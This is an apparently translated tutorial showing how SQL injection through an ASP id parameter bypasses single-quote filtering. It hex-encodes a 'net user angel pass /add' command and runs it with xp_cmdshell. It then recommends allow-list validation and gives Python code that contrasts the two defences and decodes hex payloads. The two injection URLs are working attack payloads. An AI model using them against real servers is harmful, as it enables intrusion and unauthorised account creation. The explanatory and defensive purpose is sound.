The example in my earlier article, "Implementation and Application of SQL Injection", is also of this kind: no filtering is applied to the input, so the injection succeeds quite easily, as follows:
http://www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
This often leads to a misunderstanding: that filtering ' out of a variable is enough to prevent SQL injection attacks. This belief is the reason a large number of programs remain injectable. In fact, filtering ' alone is not enough. Even with ' filtered, we can still get through. Look at the following statement:
http://www.jb51.net/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
Does it look very different from the one above? Yet the effect is exactly the same. In fact, both are just SQL statements.
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
This is "net user angel pass /add" in hexadecimal format. Anyone who knows SQL will find this easy to understand: declare a variable a, assign our instruction to a, and then pass variable a to xp_cmdshell to finally execute the command we entered. Variable a can be any command, as follows:
declare @a sysname
Select @a=
EXEC Master.dbo.xp_cmdshell @a
Solution:
Filter variables so that only specific characters are allowed in. For example, a variable of numeric type should accept only numeric data. I will not go into the details; how exactly to do it is left to the program author.
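The solution above, as an added example that is not code from the original article: a quote-only filter next to an allow-list check for the numeric id parameter, plus a helper that decodes 0x literals so a defender reviewing request logs can see what they hide. The function names are hypothetical, and the sample inputs are the two id values from the requests above.

```python
import re
from urllib.parse import unquote

# Constructed test inputs: the two id values shown in the requests above.
PLAIN = "1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--"
HEXED = ("1;declare%20@a%20sysname%20select%20@a="
         "0x6e006500740020007500730065007200200061006e006700"
         "65006c002000700061007300730020002f00610064006400"
         "%20exec%20master.dbo.xp_cmdshell%20@a;--")

HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")


def quote_filter(value):
    """The insufficient defence described above: strip single quotes only."""
    return value.replace("'", "")


def parse_numeric_id(value):
    """Allow-list check: accept 1 to 9 ASCII digits, return int, else None.

    [0-9] is used instead of \\d so that non-ASCII digits are rejected too.
    """
    return int(value) if re.fullmatch(r"[0-9]{1,9}", value) else None


def decode_hex_literals(value):
    """Log triage helper: decode every 0x... literal in a request value.

    sysname is an nvarchar type, so the bytes are read as UTF-16LE; anything
    that is not valid UTF-16LE is returned as Latin-1 text instead.
    """
    decoded = []
    for match in HEX_LITERAL.finditer(unquote(value)):
        raw = bytes.fromhex(match.group(1))
        try:
            decoded.append(raw.decode("utf-16-le"))
        except UnicodeDecodeError:
            decoded.append(raw.decode("latin-1"))
    return decoded


if __name__ == "__main__":
    for sample in ("1", PLAIN, HEXED):
        print(repr(sample[:40]),
              "| quote filter changed it:", quote_filter(sample) != sample,
              "| accepted id:", parse_numeric_id(sample),
              "| hidden text:", decode_hex_literals(sample))
```

The quote filter leaves the second request untouched because it contains no ' at all, while the allow-list check rejects both requests and accepts only a plain number.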